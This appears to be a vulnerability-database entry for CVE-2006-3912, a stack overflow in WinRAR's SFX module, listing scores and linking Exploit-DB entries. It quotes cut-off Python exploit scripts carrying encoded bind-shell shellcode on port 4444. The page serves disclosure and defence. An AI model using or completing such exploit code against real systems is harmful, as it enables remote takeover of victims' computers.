CVE-2006-3912
published 2006-07-28CVE-2006-3912: Stack-based buffer overflow in the SFX module in WinRAR before 3.60 beta 8 has unspecified vectors and impact.
PriorityP425low2.1CVSS 2.0
AVLACLAuNCNIPAN
EXPLOIT
EPSS
5.67%
92.0th percentile
Stack-based buffer overflow in the SFX module in WinRAR before 3.60 beta 8 has unspecified vectors and impact.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rarlab | winrar | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WinRAR 3.60 Beta 6 (French) - SFX Path Local Stack Overflow
exploitdb·2006-07-07
CVE-2006-3912 WinRAR 3.60 Beta 6 (French) - SFX Path Local Stack Overflow
WinRAR 3.60 Beta 6 (French) - SFX Path Local Stack Overflow
---
"""
WinRAR - Stack Overflows in SelF - eXtracting Archives
Tested Version(s)..: WinRAR 3.60 beta 4
Original Author.............: posidron
Shellcode Stuffing .........: muts
XP SP2 French return address : JA
"""
import os, sys
winrar__ = 'C:\WinRAR.exe'
sfxnfo__ = "comment.txt"
result__ = "sample.exe"
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com */
sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
sc +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
sc +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
sc +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
sc +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x
Exploit-DB
WinRAR 3.60 Beta 6 - SFX Path Local Stack Overflow
exploitdb·2006-07-05
CVE-2006-3912 WinRAR 3.60 Beta 6 - SFX Path Local Stack Overflow
WinRAR 3.60 Beta 6 - SFX Path Local Stack Overflow
---
"""
WinRAR - Stack Overflows in SelF - eXtracting Archives
Tested Version(s)..: WinRAR 3.60 beta 4
Original Author.............: posidron
Shellcode Stuffing .........: muts
"""
import os, sys
winrar__ = 'C:\WinRAR.exe'
sfxnfo__ = "comment.txt"
result__ = "sample.exe"
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com */
sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
sc +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
sc +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
sc +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
sc +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
sc +="\x4d\x34\x
Exploit-DB
WinRAR 3.60 Beta 6 - SFX Path Stack Overflow
exploitdb·2006-07-05
CVE-2006-3912 WinRAR 3.60 Beta 6 - SFX Path Stack Overflow
WinRAR 3.60 Beta 6 - SFX Path Stack Overflow
---
"""
WinRAR - Stack Overflows in SelF - eXtracting Archives
Tested Version(s)..: WinRAR 3.60 beta 4
Author.............: posidron
An SFX (SelF-eXtracting) archive is an archive, merged with an executable
module, which is used to extract files from the archive when executed. Thus no
external program is necessary to extract the contents of an SFX archive, it is
enough to execute it. Nevertheless WinRAR can work with SFX archives as with
any other archives, so if you do not want to run a received SFX archive (for
example, because of possible viruses), you may use WinRAR to view or extract
its contents. SFX archives usually have .exe extension as any other executable
file. (Quote: WinRAR Help)
WinRAR distributive includes several SFX modules
No writeups or analysis indexed.
http://www.osvdb.org/27031http://www.rarlabs.com/rarnew.htmhttps://www.exploit-db.com/exploits/1984https://www.exploit-db.com/exploits/1985https://www.exploit-db.com/exploits/1992http://www.osvdb.org/27031http://www.rarlabs.com/rarnew.htmhttps://www.exploit-db.com/exploits/1984https://www.exploit-db.com/exploits/1985https://www.exploit-db.com/exploits/1992
2006-07-28
Published